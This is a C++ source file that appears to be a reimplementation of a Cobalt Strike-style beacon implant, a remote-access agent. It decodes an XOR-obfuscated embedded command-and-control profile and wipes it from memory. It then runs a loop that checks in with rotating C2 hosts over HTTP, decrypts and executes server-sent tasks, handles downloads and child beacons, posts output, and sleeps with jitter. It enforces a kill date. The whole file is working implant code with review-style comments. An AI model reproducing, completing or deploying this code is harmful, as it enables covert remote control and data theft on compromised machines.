#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <iostream>

#include "Utils.h"
#include "Global.h"
#include "rotation.h"
#include "encrypt_decrypt.h"
#include "common.h"
#include "comm.h"
#include "BeaconTask.h"
#include "BeaconLateralMovement.h"
#include "ChildBeacon.h"
#include "BeaconSleep.h"

#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"Wininet.lib")
#ifdef _WIN64
#pragma comment(lib,"tomcryptx64.lib")
#pragma comment(lib,"tommathx64.lib")
#else
#pragma comment(lib,"tomcrypt.lib")
#pragma comment(lib,"tommath.lib")
#endif // _WIN64
|
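/* Copy one type-3 (string) profile value into its own heap block.
 * The copy gets an extra terminating NUL so get_str() callers can treat it as
 * a C string even when the profile did not zero-pad the value.
 * Returns the block, or NULL if the profile ran out of bytes or malloc failed. */
static char* copy_profile_string(datap* profile, WORD data_size)
{
    void* src = BeaconDataPtr(profile, data_size);
    if (src == NULL)
    {
        return NULL;
    }
    char* copy = (char*)malloc((size_t)data_size + 1);
    if (copy == NULL)
    {
        return NULL;
    }
    memcpy(copy, src, data_size);
    copy[data_size] = '\0';
    return copy;
}

/* Walk the decoded profile records and fill the CsC2Config slot table.
 * Record layout: index (short), type (short), size (short), then the value;
 * an index <= 0 ends the list. Slot layout: index_size bytes per slot, the
 * type at offset 0 and the value at offset sizeof(size_t) (a short, an int,
 * or a pointer to a heap copy of the string). Parsing stops at the first
 * record that would land outside the table or whose string cannot be copied;
 * every later slot stays zeroed (type 0). */
static void unpack_c2_profile(datap* profile)
{
    for (;;)
    {
        int index = BeaconDataShort(profile);
        if (index <= 0)
        {
            break;
        }
        WORD data_type = BeaconDataShort(profile);
        WORD data_size = BeaconDataShort(profile);

        /* Bounds check: the index comes from the embedded blob, so refuse any
         * record whose slot (type + value) would be written past CsC2Config. */
        size_t offset = (size_t)index_size * (size_t)index;
        if (offset + sizeof(size_t) + sizeof(ULONG_PTR) > (size_t)CsC2Config_size)
        {
            break;
        }
        char* entry = CsC2Config + offset;
        char* value = entry + sizeof(size_t);

        *(WORD*)entry = data_type;
        switch (data_type)
        {
        case 1:
            *(WORD*)value = BeaconDataShort(profile);
            break;
        case 2:
            *(DWORD*)value = BeaconDataInt(profile);
            break;
        case 3:
        {
            char* copy = copy_profile_string(profile, data_size);
            if (copy == NULL)
            {
                *(WORD*)entry = 0;   /* leave the slot unset rather than pointing at nothing */
                return;
            }
            *(ULONG_PTR*)value = (ULONG_PTR)copy;
            break;
        }
        default:
            /* Unknown type: the value bytes are not consumed here, so the
             * record stream may be out of step from this point on. This
             * mirrors the original parser; the CS profile only uses 1-3. */
            break;
        }
    }
}

/*
 * Beacon_init - decode the embedded C2 profile and unpack it into CsC2Config.
 *
 * dllbase: module base remembered in Beacon_Dllbase (main() passes NULL).
 *
 * rawData carries the serialized profile XOR-obfuscated with the single byte
 * 0x2E. It is decoded in place, parsed into the slot table (see
 * unpack_c2_profile) and then wiped so the plaintext profile does not stay
 * resident in the image. If the slot table cannot be allocated nothing is
 * decoded or parsed and CsC2Config stays NULL.
 */
void Beacon_init(HINSTANCE dllbase)
{
    Beacon_Dllbase = dllbase;

    /* Slot table; zero-filled so slots the profile never sets read as type 0. */
    CsC2Config = (char*)malloc(CsC2Config_size);
    if (CsC2Config == NULL)
    {
        return;
    }
    memset(CsC2Config, 0, CsC2Config_size);

    /* Undo the single-byte XOR over the embedded profile bytes. */
    const int raw_config_len = 0x1000;
    for (int i = 0; i < raw_config_len; ++i)
    {
        rawData[i] ^= 0x2Eu;
    }

    datap c2profile;
    BeaconDataParse(&c2profile, (char*)rawData, raw_config_len);
    unpack_c2_profile(&c2profile);

    /* Scrub the decoded profile. rawData has static storage, so this store is
     * not a trivially dead one, but a SecureZeroMemory-style wipe would be the
     * form the compiler is guaranteed not to drop. */
    memset(rawData, 0, sizeof(rawData));
}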
|
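/*
 * beacon_stop_date - has the configured kill date been reached?
 *
 * Config slot 40 holds the kill date as a decimal YYYYMMDD integer; 0 means
 * no kill date. Today's date comes from GetLocalTime, so the comparison is
 * made in the host's local time zone, not UTC.
 *
 * Returns 0 when no kill date is set or it is still in the future, and
 * non-zero once today's date is on or after the kill date.
 */
int beacon_stop_date()
{
    /* Read the slot once instead of on every reference. */
    DWORD killdate = get_dword(40);
    if (!killdate)
    {
        return 0;
    }

    struct _SYSTEMTIME now;
    GetLocalTime(&now);

    /* Pack today the same way as the config value: YYYY*10000 + MM*100 + DD. */
    unsigned int today = now.wDay + 100 * (now.wMonth + 100 * (unsigned int)now.wYear);
    return today >= killdate;
}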
|
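/*
 * Beacon_exit - terminate the beacon according to the configured exit mode.
 *
 * Config slot 55 == 1 selects a thread-only exit: the calling thread ends
 * with ExitThread(0) and the host process stays alive; if slot 39 is also 1
 * the thread instead parks forever in a Sleep loop. Otherwise the whole
 * process exits: directly via ExitProcess(0), or, when slot 39 == 1, from a
 * newly created thread whose start routine is ExitProcess, which this thread
 * then waits on. (What slot 39 represents in the profile is not visible in
 * this file.)
 *
 * Returns the WaitForSingleObject result on the one path that can return.
 * If CreateThread fails we fall back to ExitProcess(0) directly; the original
 * waited on a NULL handle, which returns at once and left the beacon running.
 */
int Beacon_exit()
{
    const int opt55 = get_short(55) == 1;
    const int opt39 = get_short(39) == 1;

    if (opt55)
    {
        if (opt39)
        {
            for (;;)
            {
                Sleep(1000);
            }
        }
        ExitThread(0);
    }

    if (!opt39)
    {
        ExitProcess(0);
    }

    /* ExitProcess is used as the thread entry point; on Windows its calling
     * convention is compatible with LPTHREAD_START_ROUTINE for this purpose. */
    HANDLE exit_thread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ExitProcess, 0, 0, 0);
    if (exit_thread == NULL)
    {
        ExitProcess(0);
    }
    return WaitForSingleObject(exit_thread, 0xFFFFFFFF /* INFINITE */);
}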
|
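/* Bounded string copy. _snprintf() on MSVC leaves the buffer without a NUL
 * when the source fills it completely, so a terminator is forced after every
 * copy; the callers below later read these buffers as C strings. */
static void copy_cstr(char* dst, size_t cap, const char* src)
{
    if (dst == NULL || cap == 0)
    {
        return;
    }
    _snprintf(dst, cap, "%s", src);
    dst[cap - 1] = '\0';
}

/*
 * main - beacon entry point: load the profile, then run the check-in loop.
 *
 * Each iteration picks a host from the rotation strategy, sends the
 * encrypted session metadata over HTTP GET, decrypts and runs any tasks in
 * the reply, services downloads / child beacons / job output, posts queued
 * output, and sleeps for the configured interval minus jitter. A -1 from
 * call_send_Metadata marks a connection error for the next rotation step.
 * The loop ends when the sleep interval becomes 0 or the kill date passes;
 * Beacon_exit() then terminates the beacon.
 *
 * The numbered get_*() slots are profile entries unpacked by Beacon_init.
 * The slot meanings noted below are the original author's and cannot be
 * verified from this file alone.
 */
int main()
{
    enum
    {
        kGetUrlCap = 256,
        kReservedCap = 256,
        kHostCap = 128,
        kParserSize = kGetUrlCap + kReservedCap + kHostCap,   /* 0x280 */
        kPostUrlCap = 0x100
    };

    Beacon_init(NULL);   /* no module base: this build runs as a plain executable */

    /* One arena carved into three fixed-size scratch strings. */
    datap* parser = BeaconDataInit(kParserSize);
    if (parser == NULL)
    {
        return Beacon_exit();
    }
    char* http_get_url = BeaconDataPtr(parser, kGetUrlCap);
    BeaconDataPtr(parser, kReservedCap);   /* middle region reserved but unused here */
    char* ServerHost_buffer = (char*)BeaconDataPtr(parser, kHostCap);
    if (http_get_url == NULL || ServerHost_buffer == NULL)
    {
        return Beacon_exit();
    }

    char* ServerIP = get_str(8);
    int ServerPort = get_short(2);
    char* lpszAgent = get_str(9);
    char* ServerPostUrl = get_str(10);

    g_dwMilliseconds = get_dword(3);   /* sleep interval, milliseconds */
    g_jitter = get_short(5);           /* jitter as a percentage of the interval */

    int conne_error = 0;

    /* Host rotation / failover state. Author's notes on slots 67-70:
     *   67: strategy id (0 round-robin, 1 random, 2 rotate or failover)
     *   68: rotate interval
     *   69: failover failure-count threshold (0 = plain failover)
     *   70: failover time threshold */
    rotationstruc* rotation_opt = (rotationstruc*)malloc(sizeof(rotationstruc));
    if (rotation_opt == NULL)
    {
        return Beacon_exit();
    }
    int failover_Strategy_number = get_dword(69);
    int failover_Strategy_time = get_dword(70);
    int rotate_Strategy_time = get_dword(68);
    int strategyID = get_short(67);
    init_rotation(rotation_opt, strategyID, rotate_Strategy_time, failover_Strategy_time, failover_Strategy_number);

    if (beacon_stop_date())
    {
        Beacon_exit();
    }

    /* Metadata buffer sized by .http-get.server.output; it doubles as the
     * receive buffer for the server's reply. */
    int server_output_size = get_dword(4);
    char* server_output_buffer = (char*)malloc(server_output_size);
    if (server_output_buffer == NULL)
    {
        free(rotation_opt);
        return Beacon_exit();
    }
    Generate_encryption_metadata(server_output_buffer, server_output_size);   /* build and encrypt session metadata */

    while (g_dwMilliseconds)
    {
        /* Choose this check-in's host; conne_error feeds the failover decision. */
        char* p_ServerHost = beacon_Rotation_Strategy(rotation_opt, ServerIP, conne_error);
        copy_cstr(ServerHost_buffer, kHostCap, p_ServerHost);
        conne_error = 0;
        char* p_ServerUrl = beacon_Rotation_Strategy(rotation_opt, ServerIP, 0);
        copy_cstr(http_get_url, 0x80, p_ServerUrl);   /* original cap of 0x80, though 256 bytes are reserved */
        g_BeaconStart = 1;
        copy_cstr(g_post_url, kPostUrlCap, ServerPostUrl);
        set_winit_http(ServerHost_buffer, ServerPort, lpszAgent);   /* HTTP session options */

        int server_out_size = call_send_Metadata(http_get_url, server_output_buffer, server_output_size);
        if (server_out_size > 0)
        {
            /* NOTE: the decrypt result replaces server_out_size, so a -1 from
             * decrypt_output_data is treated below exactly like a connection
             * failure (original behavior). */
            int taskdata_size = decrypt_output_data(server_output_buffer, server_out_size);
            server_out_size = taskdata_size;
            if (taskdata_size > 0)
            {
                Parse_Task((BeaconTask*)server_output_buffer, taskdata_size);   /* run the decrypted tasks */
            }
        }

        if (server_out_size == -1)
        {
            conne_error = 1;   /* connection failed; the rotation strategy reacts next pass */
        }
        else
        {
            sub_1000715A();   /* decompiler-named helper; its role is not visible in this file */

            /* Slot 28 selects the smaller download chunk size. */
            CheckDownload(get_dword(28) ? 4096 : 0x80000);
            CheckChildBeacon();
            CheckJobOutput();
            if (beacon_stop_date())
            {
                Beacon_end();
            }
            if (g_withdatasize > 0)
            {
                /* Reopen the session before posting the queued output. */
                close_http_Handle();
                set_winit_http(ServerHost_buffer, ServerPort, lpszAgent);
                sned_beacon_data(gBeaconOutputData);
            }
        }
        close_http_Handle();

        if (beacon_stop_date())
        {
            Beacon_exit();
        }
        if (!g_dwMilliseconds)
        {
            break;   /* a task set the sleep to 0: leave the loop and exit */
        }

        /* Sleep for the interval minus a random jitter of up to g_jitter percent.
         * The jitter window is computed in 64 bits because interval * jitter
         * overflows int once the interval reaches a few hours. */
        int dwMilliseconds = g_dwMilliseconds;
        if (g_jitter)
        {
            long long window = (long long)g_dwMilliseconds * g_jitter / 100;
            long long skew = window ? (random_int() % window) : 0;
            if (skew < (long long)g_dwMilliseconds)
            {
                dwMilliseconds = (int)(g_dwMilliseconds - skew);
            }
        }
        BeaconSleep(dwMilliseconds);
    }

    free(server_output_buffer);
    free(rotation_opt);
    return Beacon_exit();
}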